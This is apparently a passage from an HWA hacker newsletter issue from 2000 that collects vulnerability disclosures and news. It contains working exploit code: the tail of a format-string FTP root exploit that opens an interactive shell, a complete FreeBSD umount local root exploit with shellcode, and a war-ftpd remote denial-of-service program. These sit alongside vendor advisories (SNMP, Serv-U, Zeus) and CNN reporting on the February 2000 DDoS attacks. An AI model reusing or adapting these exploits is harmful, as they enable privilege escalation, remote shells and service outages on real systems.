strncpy(buf+16,"%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u",NUM); strcpy(buf+16+NUM,"%n%n\r\n"); write(sockfd,buf,strlen(buf)); sleep(1); /* 0x0187e5cc: session.uid*/ buf[8] = 0x01; buf[9] = 0x87; buf[10] = 0xe5; buf[11] = 0xcc; buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xce; write(sockfd,buf,strlen(buf)); /* 0x187e5d0: session.ouid */ buf[8] = 0x01; buf[9] = 0x87; buf[10] = 0xe5; buf[11] = 0xd0; buf[12] = 0x01; buf[13] = 0x87; buf[14] = 0xe5; buf[15] = 0xd2; write(sockfd,buf,strlen(buf)); /* LIST switches uid to session.ouid to bind to port 20 (ftp-data - privelidged port) */ write(sockfd,"LIST\r\n",6); /* LIST returns error "No data connection" */ do{ read(sockfd,buf,sizeof(buf)); }while(strstr(buf,"connection") == NULL); printf("Opening shell-connection\n"); shell(sockfd); printf("THE END\n"); close(sockfd); } void shell(int sockfd) { char buf[1024]; fd_set set; int len; while(1) { FD_SET(fileno(stdin),&set); FD_SET(sockfd,&set); select(sockfd+1,&set,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&set)) { memset(buf,NULL,1024); fgets(buf,1024,stdin); write(sockfd,buf,strlen(buf)); } if(FD_ISSET(sockfd,&set)) { memset(buf,NULL,1024); if((len = read(sockfd,buf,1024)) == 0) { printf("EOF.\n"); exit(-1); } if(len == -1) { perror("read"); exit(-1); } puts(buf); } } } void ftplogin(int sockfd, char *user,char *passwd) { char send[500]; memset(send,NULL,500); snprintf(send,500,"USER %s\r\n",user); write(sockfd,send,strlen(send)); wait_msg(sockfd); memset(send,NULL,500); snprintf(send,500,"PASS %s\r\n",passwd); write(sockfd,send,strlen(send)); wait_msg(sockfd); return; } void wait_msg(int sockfd) { char c; while(read(sockfd,(char *)&c,sizeof(char)) > 0) { if(c == '\n') break; } } unsigned long resolve(char *hostname) { struct hostent *hp; unsigned long ip; if((ip = inet_addr(hostname)) == -1) { if((hp = gethostbyname(hostname)) == NULL) { printf("Can't resolve hostname <%s>.\n",hostname); exit(-1); } memcpy(&ip,hp->h_addr,4); } return ip; } void usage(char *name) { printf("Usage: %s <host> [-n name] [-p pass] [-c port]\n",name); exit(-1); } @HWA 181.0 Insecure defaults in SCO openserver 5.0.5 leaves the barn doors open. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm ====================================================================== Network Associates, Inc. SECURITY ADVISORY February 7, 2000 SNMPD default writable community string ====================================================================== SYNOPSIS The default configuration of SCO OpenServer 5.0.5 allows local users read/write access to SNMPD via a default writable community string. ====================================================================== VULNERABLE HOSTS This configuration has been verified on SCO OpenServer 5.0.5 and may be present in earlier versions. ====================================================================== DETAILS SNMP(S.imple N.etwork M.anagement P.rotocol) is a protocol suite used to manage information obtained from network entities such as hosts, routers, switches, hubs, etc. A management station collects the information from these various network entities via SNMP variable querys. Information events called traps can also be sent from entities to managment stations notifying the station of critical changes such as changes to interface status, packet collisions, etc. These domains of SNMP managment stations and entities are grouped togather in what are called communities. The community name (called the community string) is used as the authentication method used for information retrieval/traps. There are 2 types of community strings read(public), and write(private). A read community has privilages to retrieve variables from SNMP entities and a write community has privilages to read as well as write to entity variables. The problem lies in that the default installation of SCO OpenServer 5.0.5 has snmpd enabled with a default write(private) community string. SCO has released a security bulletin for this vulnerability, which can be found at: http://www.sco.com/security. ====================================================================== TECHNICAL DETAILS SNMPD, run on startup by SCO OpenServer 5.0.5, is configured by default with a writable(private) community string. This allows any local user full administrator access to the SNMPD facility. The potential abuses of this privelege include the ability to modify hostname, network interface state, IP forwarding and routing, state of network sockets (including the ability to terminate active TCP sessions and listening sockets) and the ARP cache. An attacker also has full read access to all SNMP facilities. ====================================================================== RESOLUTION The community string definitions can be found in /etc/snmpd.comm Remove/modify these strings and restart snmpd. Alternatively, if your site does not use SNMP, kill snmpd and remove it from system startup files. ====================================================================== CREDITS Discovery and documentation of this vulnerability was conducted by Shawn Bracken <shawn_bracken@nai.com> at the security labs of Network Associates. ====================================================================== ABOUT THE NETWORK ASSOCIATES SECURITY LABS The Security Labs at Network Associates hosts some of the most important research in computer security today. With over 30 security advisories published in the last 2 years, the Network Associates security auditing teams have been responsible for the discovery of many of the Internet's most serious security flaws. This advisory represents our ongoing commitment to provide critical information to the security community. For more information about the Security Labs at Network Associates, see our website at http://www.nai.com or contact us at <seclabs@nai.com>. ====================================================================== NETWORK ASSOCIATES SECURITY LABS PGP KEY - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 5.5.5 mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC 8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh 01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p 2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4 QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ =L3C6 - ---- @HWA 182.0 Malformed link in SERVU then a list = instant DoS (crash!) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Local / Remote D.o.S Attack in Serv-U FTP-Server v2.5b for Win9x/WinNT Vulnerability USSR Advisory Code: USSR-2000032 Release Date: February 04, 2000 Systems Affected: Serv-U FTP-Server v2.5b and maybe other versions. Windows 95 Windows 98 Windows Nt 4.0 WorkStation Windows Nt 4.0 Server THE PROBLEM UssrLabs found a buffer overflow, in one Windows Api "SHGetPathFromIDList" This function converts an item identifier list to a file system path, just one Api who manage Links files under windows. If you have one malformed link file you can crash anything who try to Translate from .lnk file like EXPLORER.EXE. all common dialogs and so on (copy one malformed link file to the desktop,and you cant login intro the machine). To made Serv-u crash just upload one malformed link file in any serv-u directory and type the ftp command LIST, and Server Crashh. Note: this overflow no work under win2k Example Malformed link in: http://www.ussrback.com/god.lnk Binary or source for this Exploit: http://www.ussrback.com/ Vendor Status: Contacted. Vendor Url: http://ftpserv-u.deerfield.com/ Program Url: http://ftpserv-u.deerfield.com/download.cfm Credit: USSRLABS SOLUTION Next version, personal code for handle links files. Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOJpk5tybEYfHhkiVEQKClgCeLGzAF22XekE1PuQl1Gn0YFKWrw0AnjnW 0ERSgzfn2hLW0mykNlSgZeea =ZU9/ -----END PGP SIGNATURE----- @HWA 183.0 FreeBSD 3.3-RELEASE /sbin/umount local exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By babunia@freebsd.lublin.pl Packetstorm: /* * * (c) 1999 babcia padlina ltd. <babunia@freebsd.lublin.pl> * FreeBSD 3.3-RELEASE /sbin/umount exploit. * */ #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <string.h> #define NOP 0x90 #define OFS 1800 #define BUFSIZE 1024 #define ADDRS 1200 #define DIR "babcia padlina ltd." long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc > 1) ofs = atoi(argv[1]); else ofs = OFS; noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); if(!(buf = (char *)malloc(ADDRS+1))) { perror("malloc()"); return -1; } p = buf; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "RET: 0x%x len: %d\n\n", ret, strlen(buf)); chdir(getenv("HOME")); chmod(DIR, 0755); rmdir(DIR); mkdir(DIR, 0755); chdir(DIR); chmod(".", 0); execl("/sbin/umount", "umount", buf, 0); return 0; } @HWA 184.0 Yet another War-ftpd vulnerabilty (why do ppl use this?) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: Hello, "war-ftpd" is very popular ftp server for Windows95/98/NT. I found DoS problem to "war-ftpd 1.6x" recently. Outline: It seems to occur because the bound check of the command of MKD/CWD that uses it is imperfect when this problem controls the directory. However, could not hijack the control of EIP so as long as I test. It is because not able to overwrite the RET address, because it seems to be checking buffer total capacity properly in 1.66x4 and later. The boundary of Access Violation breaks out among 8182 bytes from 533 bytes neighborhood although it differs by the thread that receives attack. The version that is confirming this vulnerable point is as follows. 1.66x4s, 1.67-3 The version that this vulnerable point was not found is as follows. 1.71-0 Test Environments: Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2 Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2 Microsoft WindowsNT 4.0 Server SP4 Japanese version Solution: 1.70-1 should be used to solve this problem fundamentally. Because it becomes "Access denied" in 1.71-0 DoS did not break out. --- warftpd-dos.c I coded program for the reappearance of this problem. The contents apply DoS attack for "war-ftpd" to the server who is working from the remote. /*--------------------------------------------------------------*/ /* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/ /*--------------------------------------------------------------*/ #include <stdio.h> #include <string.h> #include <winsock.h> #include <windows.h> #define FTP_PORT 21 #define MAXBUF 8182 //#define MAXBUF 553 #define MAXPACKETBUF 32000 #define NOP 0x90 void main(int argc,char *argv[]) { SOCKET sock; unsigned long victimaddr; SOCKADDR_IN victimsockaddr; WORD wVersionRequested; int nErrorStatus; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; hostent *victimhostent; WSADATA wsa; if (argc < 3){ printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); nErrorStatus = WSAStartup(wVersionRequested, &wsa); if (atexit((void (*)(void))(WSACleanup))) { fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1); } if ( nErrorStatus != 0 ) { fprintf(stderr,"Winsock Initialization failed\n"); exit(-1); } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ fprintf(stderr,"Can't create socket.\n"); exit(-1); } victimaddr = inet_addr((char*)argv[1]); if (victimaddr == -1) { victimhostent = gethostbyname(argv[1]); if (victimhostent == NULL) { fprintf(stderr,"Can't resolve specified host.\n"); exit(-1); } else victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0])); } victimsockaddr.sin_family = AF_INET; victimsockaddr.sin_addr.s_addr = victimaddr; victimsockaddr.sin_port = htons((unsigned short)FTP_PORT); memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero)); if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){ fprintf(stderr,"Connection refused.\n"); exit(-1); } printf("Attacking war-ftpd ...\n"); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); sprintf((char *)packetbuf,"USER %s\r\n",argv[2]); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; sprintf((char *)packetbuf,"CWD %s\r\n",buf); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); Sleep(100); shutdown(sock, 2); closesocket(sock); WSACleanup(); printf("done.\n"); } ---- Toshimi Makino E-mail:crc@sirius.imasy.or.jp @HWA 185.0 Z0rk a Zeus Web Server DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~ Packetstorm: This morning Zeus Technology Limited was informed of a serious security bug in the Zeus Webserver by 'The Relay Group' (http://relaygroup.com). This document describes the scope of the problem and its solution. Versions affected ----------------- Zeus 3.1.x / 3.3.x Severity -------- High- this bug allows the contents of CGI scripts to be read by a remote client, if the scripts are run with the CGI module's "allow CGIs anywhere" option enabled. It does not affect CGIs run from designated directories (cgi-bins). Nonetheless, we recommend that all customers upgrade to Zeus 3.3.5a- see below for further details. Description ----------- Requests for URLs which contains the text '%00' are decoded to contain a null-terminator. This means that files can be accessed via URLs that are not access controlled, allowing files that are *inside* the document root to be retrieved. For example, if you run a webserver with the 'allow CGI anywhere' option, and have a Perl CGI script inside the document root accessible as 'http://mysite/script.cgi' then a request for 'http://mysite/script.cgi%00' will cause the webserver to return the Perl source of the CGI script to the client. This happens because the mime-type of '.cgi\0' does not map to 'application/x-httpd-cgi', so is instead served by the get module as 'text/plain'. The webserver will ask the OS for the file 'script.cgi\0\0', and due to the zero-terminated string interface of Unix, the OS will actually open 'script.cgi\0' instead of returning a "file-not-found" error. Problem Solution ---------------- We have fixed the problem in the latest version of Zeus (3.3.5a) now available for all 14 platforms from our ftp site ftp://ftp.zeustechnology.com/pub/products/z3. This version will report itself as '3.3.5a' and also display today's (8th Feb) date on startup. Download the distribution for your platform, untar it, and run './zinstall --force' and it will seamlessly upgrade your running server to the fixed release. -- Julian Midgley Tel: +44 1223 525000 Technical Services Manager Fax: +44 1223 525100 Zeus Technology Ltd http://www.zeustechnology.com Newton House, Cambridge Business Park, Cambridge. CB4 OWZ. England @HWA 186.0 Following up on the DDoS attacks of the last week (Various) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CNN: via Security Focus Consulting firm says its server was used to attack AOL February 11, 2000 Web posted at: 6:57 p.m. EST (2357 GMT) In this story: AOL: Assault didn't amount to a pinprick FBI focuses on California, Oregon locations Server compromised How they did it RELATED STORIES, SITES From Interactive Technology Editor D. Ian Hopper and Justice Correspondent Pierre Thomas NEW YORK (CNN) -- Envisioneering Group, a Long Island technology consultant, told CNN on Friday that one of its servers was hijacked on two separate days to launch a version of a denial of service attack on a major Web site. In such assaults, hackers hijack multiple third-party computers and use those "zombie" computers to flood target sites with data, essentially shutting down access to the sites for would-be users. The first intrusion was on January 29 and involved using a computer to pass large volumes of e-mail from a third party on to a Web site server in an attempt to overwhelm the site. In the span of 15 minutes, several dozen e-mails a second were sent through the Envisioneering server to both Yahoo! and America Online. During the attack, engineers at Envisioneering stopped the attack, according to Envisioneering Group President Richard Doherty. "We dumped all the pending mail, and that stopped the repeated attacks [on Envisioneering]," Doherty said. Yahoo! was jammed by messages on Monday. The Envisoneering server was used again in the same fashion on Tuesday, a day when highly trafficked Internet sites such as Amazon.com, Buy.com and CNN.com were hit with denial of service attacks. But in the second incident involving his server, Doherty says he doesn't know exactly where the messages were sent. AOL: Assault didn't amount to a pinprick The first attack could have been a form of target practice to confirm that the Envisioneering server was vulnerable with the intention of using it in the later attack. AOL, for its part, reported no out of the ordinary traffic on either of the dates cited by Doherty. The attack had no effect on the huge Internet service provider, an AOL spokeswoman said. Envisioneering uses Mindspring for its Internet access. but even if a hacker somehow gained control of the entire Mindspring network and pointed it at AOL, it wouldn't "register a significant amount of volume to cause a problem," according to AOL spokesperson Tricia Primrose. This is because of Mindspring's relatively small total bandwidth. With the known resources of the intruder -- one computer at Envisioneering Group -- the assault didn't even amount to a pinprick, Primrose said. Yahoo! did not immediately return calls for comment. AOL has proposed buying Time Warner Inc., the parent company of CNN.com. It is awaiting approval from the Federal Trade Commission. FBI zeroing in on locations in California, Oregon Meanwhile, CNN has learned the FBI is zeroing in on undisclosed locations in California and Oregon as it attempts to unravel this week's cyber assaults. According to sources familiar with the investigations, the FBI is hoping to obtain computers that it believes were used in an attack on CNN.com. No arrests are considered imminent. The FBI's planned action comes after investigators discovered the computer system at the University of California at Santa Barbara was used in the attack against CNN.com. As the smoke begins to clear from the spate of attacks, CNN continues to get sporadic reports about other major Web sites assaulted. Excite@Home confirmed that it was attacked Wednesday night at 7 p.m. PST. The attack lasted about an hour, according to a spokesperson. About 50 percent of users trying to access the Excite portal and search engine couldn't reach the site during the attack, which targeted and overloaded routers. Only the Web site was under attack, the @Home cable network was not affected. "We're working with the Internet community to try to find out what's going on," says Excite@Home spokesperson Kelly Distefano. Server compromised A University of California- Santa Barbara network administrator has confirmed that a server at the university was compromised and used in at least one of the attacks against major Web sites this week. Sources declined to identify the owners of the computers that are being targeted. While those owners may emerge as suspects, sources point out that their computers might have been programmed without their knowledge. Still, the belief is that these computers may have been used to direct commands to a computer system at UCSB. This computer then flooded the affected Web site with millions of messages -- blocking access to customers. UCSB administrator Kevin Schmidt said an intruder entered the UCSB machine at least twice. After entering the first time to open doors needed later, the intruder returned to install a software package designed to carry out an attack, Schmidt said. The program, once executed, began its assault by sending out connection requests to the target Web site creating a "denial of service" attack. With enough requests sent to a single Web site, the site can be rendered inaccessible to legitimate users. In order to conceal the attack, the program began rotating the origination addresses of the requests. This method, known generally as "spoofing," is used to thwart filters on the target machine designed to identify and weed out malicious data. Schmidt said the intruder was "sloppy" in his work and failed to destroy all the logs monitoring activity on the server. "There wasn't a great effort to hide their presence," Schmidt said. "I don't think this behavior was atypical" of an untrained hacker. How they did it The intruder entered the UCSB computer through a known vulnerability in an installed network service. These vulnerabilities are frequently announced through Carnegie Mellon University's CERT group, National Infrastructure Protection Center and other network security forums. To plug the holes, administrators simply need to install patches or workarounds. However, with so many individual machines on the Internet and other demands competing for the time of a network guru, many computers are left unsecured. Along with CNN.com, other attacks were carried out against Yahoo!, eBay and Amazon.com As CNN has reported, the programs needed to make a denial of service attack are very simple to find on several Web sites. They are ready-made programs that are easy for almost anyone to use. ========================================================================== CNN: FBI agents focus on university, business computers as cyber-attack launch pads February 11, 2000 Web posted at: 7:48 a.m. EST (1248 GMT) In this story: Investigation scope Motive still unknown Y2K daemons? More vigilance catching intrusions Pentagon checking its computers RELATED STORIES, SITES From staff and wire reports WASHINGTON (CNN) -- The FBI is pursuing leads that a series of attacks on popular computer Web sites was launched from high-capacity computer systems at a university or at businesses. Officials believe the school or businesses were an unwitting launch pad for the string of attacks. According to government sources, the attackers infected those computer systems with denial of service programs. Those programs in turn forced the university or business systems to send out millions of messages aimed at overloading the targeted Web sites. Investigation scope The massive federal investigation into this week's string of cyber attacks may extend overseas, Justice Department officials say. Deputy Attorney General Eric Holder said there is "no indication at this point that we are looking at anything that comes from outside the country, though there have been previous, similar attacks that have been launched from outside the country, so that is a possibility we'll certainly have to consider." Senior officials said the multistate investigation now includes major efforts by FBI field offices in four states, and involves "countless numbers" of agents in several others. Motive still unknown "These are people who are criminals," Holder told reporters at a Justice Department briefing Thursday. "The collective loss, and the cost to respond to these kinds of attacks, can run into the tens of millions of dollars or more." On Wednesday, online brokerage E-Trade Group and technology news site ZDNet became the latest victims. Their sites were knocked out for more than an hour. The attacks began Monday against Yahoo!, the largest independent Web site. They spread Tuesday to CNN.com and leading retailers Buy.com, eBay and Amazon.com. The cyber bandits have been quick to exploit technology even as U.S. government investigators become more computer savvy. "We need additional people," said Holder. "We need additional forensic capabilities. This is, as everybody understands, a fast-changing area." It's both fast changing and potentially devastating to Internet commerce. The Clinton administration is asking Congress to increase funding for the Justice Department's anti-cybercrime efforts by more than a third -- from roughly $100 million to $137 million. Holder said investigators inside and outside the government were working together in a complex effort to track down the hackers. He said that while authorities do not yet know the motive of sthose responsible, officials consider the matter "very serious" and that the Justice Department may have to consider increasing penalties for cyber-criminals. A senior Justice Department official involved in the probe said it's likely the hacker or hackers who clogged several popular Internet sites used "dozens or even hundreds" of computers to launch the attacks. The official, asking not to be identified, said after officials discovered certain "distributed denial of service" tools in December, a warning was sent out. Y2K daemons? The official said these tools, called daemons, can be planted on hundreds of innocent third-party computers, and await a command issued much later from a remote location to launch attacks on a single target. The official refused to comment on whether the daemons found in the intensive preparations to guard against Y2K problems were involved in the current attacks. A Senate leader who has conducted a series of hearings on countering the cyber threat issued a statement Thursday saying the government had failed to be prepared for such cyber attacks, and he promised additional hearings. "Efforts to protect critical computer networks have unfortunately not kept pace with the march of technology," said Sen. Jon Kyl,R-Arizona. "I have been a firm believer that it was always a question of when, not if, our vulnerabilities would be exploited by someone with malicious intent," Kyl said. "The events of the last three days confirm that view." More vigilance catching intrusions One positive development from the attacks is that some network administrators are being extra careful about checking possible intrusions. The Los Angeles Times Web site, latimes.com, received a warning from its Internet service provider, GTE Internetworking, that there had been several attacks against the ISP and urged its customers to be more vigilant. On Wednesday morning, engineers discovered that one of the latimes.com servers was running a "little abnormally," according to Dan Royal, operations manager for the site. They found that someone had entered the server from the outside and placed an "Internet relay chat" program that took up so much bandwidth as to create a disturbance. The incident had no effect on users. "It caused no damage, other than a whole lot of people pulling their hair out," Royal said. Pentagon checking its computers Pentagon officials stressed the military has not been hit by the denial of service attacks and said there's nothing to indicate the systems have been compromised. "We've been watching with great interest," said Rear Adm. Craig Quigley at Thursday's Pentagon briefing. "We need to be aware of potential hacking into the DOD computer system and be able to defend against some of those attacks." The Defense Department is putting out a message to its computer network administrators to check the hard drive systems. Quigley said the Pentagon wants "to see if someone has planted some of this denial of service tools on the drives of Defense Department computers." The spokesman said the check is to make sure the Pentagon's computers could not have unwittingly been a part of the denial of service regime that's being used to clobber some of the other servers." Pentagon computers were updated and prepared for any Y2K rollover glitches in a $3.6 billion fix over 18 months leading up to January 1. There was no estimate on how long the new checks would take, but the spokesman said Pentagon officials will be on their toes and aware of what's happening. The Defense Department is the federal government's single biggest user of computers. "We have no reason to suspect that any of our systems are in fact involved in this, but we're also not sure until we check." ============================================================================== Law enforcement asks cyber-community for more vigilance February 9, 2000 Web posted at: 7:26 p.m. EST (0026 GMT) In this story: FBI offers detection software Hackers could face 10-year sentences 'A 15-year-old could launch these attacks' RELATED STORIES, SITES WASHINGTON (CNN) -- While vowing to use the FBI, military, Secret Service and the intelligence community to find the hackers behind this week's wave of major cyber-attacks, federal law enforcement officials also encouraged the Internet community to toughen its own defenses against hackers. "We are committed in every way possible to tracking down those responsible, to bringing them to justice and to seeing that the law is enforced," Reno said at an FBI news conference. Several e-commerce sites, portals and news outlets were hit by the computer attacks that began Monday, leaving them unreachable to the public for hours and flooded with junk data. "These cyber-assaults have caused millions of Internet users to be denied services," said Reno. She said the motives of the hackers are unknown, but "they appear to be intended to interfere with and disrupt legitimate electronic commerce." Ronald Dick, who heads computer investigations at the FBI, said it is highly likely that the attacks came from unwitting individuals or businesses whose computers have been compromised. "Tools by which to launch these attacks have been placed there without their knowledge, and someone at a remote location is controlling those tools to launch attacks against the victims," Dick said. He said a popular place for cyber-criminals to plant such software was on third-party computers, many of them belonging to Internet service providers, or ISPs. Logs at the ISPs will be crucial to the investigation. FBI offers detection software Tools and defensive measures exist that can be used against hackers to minimize damage, Dick said. "Many of the distributed 'denial of service' tools currently are readily available out there on the Internet," he said. "You can download them, and it doesn't take any particular technical knowledge by which to utilize them." Dick said prevention, such as implementing security measures, is the key to stopping attacks on computer systems, whether in the private or public sectors. He said it is the responsibility of the entire cyber community because any lapse of computer security by one entity could cause harm to others. Dick said the FBI's National Infrastructure Protection Center (NIPC) has had multiple reports of computer intruders installing "distributed denial of service (DDOS) tools" on various computer systems. Those tools enable individuals to remotely launch cyber attacks. Those DDOS tools can be detected by software the NIPC is making available on its Web site at http://www.fbi.gov/nipc/trinoo.htm. Hackers could face 10-year sentences Investigators will be challenged in tracking down the originators of the attacks because many source addresses have been "spoofed" or falsified. However, Dick said they can ultimately be traced. "We're running every lead down until we find who did this," he said. Investisgators will use electronic surveillance to track back through ISPs and find who was at the keyboard, he said. Asked if there had been any credible claims of responsibility, Dick said, "None that I'm aware of." He said the attacks are a violation of federal statutes punishable by a minimum six-month prison sentence for first-time offenders and 10 years for repeat offenders. Criminal fines can range from $250,000 per count up to twice the gross loss of the victim. 'A 15-year-old could launch these attacks' The cyber attacks began earlier in the week when Yahoo!, the Internet's most popular site, was jammed with messages beyond its vast capacity to handle them. On Tuesday, sites such as Amazon.com, Buy.com, and CNN.com were the victims of similar attacks. The attacks continued Wednesday with on-line broker E*Trade being partially blocked along with computer information site ZDNet.com. Under the onslaught of messages, said Dick, the victim's Internet site simply shuts down until filters can be put in place that turn away the bogus messages. Dick said a high level of technical sophistication is not necessary to launch such cyber attacks. "A 15-year-old kid could launch these attacks," he said. But the search for those responsible likely will go global. "Historically, this is not just a U.S. issue. Inevitably we wind up overseas, where an unwitting ISP is utilized as a launch pad," Dick said. @HWA 187.0 InetServ 3.0 - Windows NT - Remote Root Exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ADVISORY -------- Greg Hoglund, Jan 2000 http://www.rootkit.com - Reporting LIVE from RSA 2000 - "The San Jose Convention Center... a contingent of trenchcoats mass in a dark corner laptops flipped to trade zer0-Day 'sploits..." Target: InetServ 3.0 - Windows NT - Remote Root Theme: Poorly Tested Software I believe in full disclosure. A year ago I would have contacted the software vendor and informed them of a security problem, and waited a period of time before releasing the information. On or about Jan 1, 2000 I abondoned this philosophy. The number of unreleased, unpatched exploits related to buffer conditions is staggering. My deduction follows. I, like many Hackers, have personally written software to test for and locate new buffer overflows in software. Occasionally for fun I will download a platter of the latest shareware and run it thru the Mill. As expected, I will find exploitable conditions. However, the sheer number of exploitable conditions surprises even myself. After downloading a copy of InetServ 3.0 - a proxy server for Windows NT, I started testing a single remotely-addressable function of the software - a web service. In less than 1 minute...my automated testing software had already located a buffer overflow - a childlike and brainless overflow. It appeared that an http GET request with a 537 byte path would own EIP (in other words, allow me to control the remote processor). This is 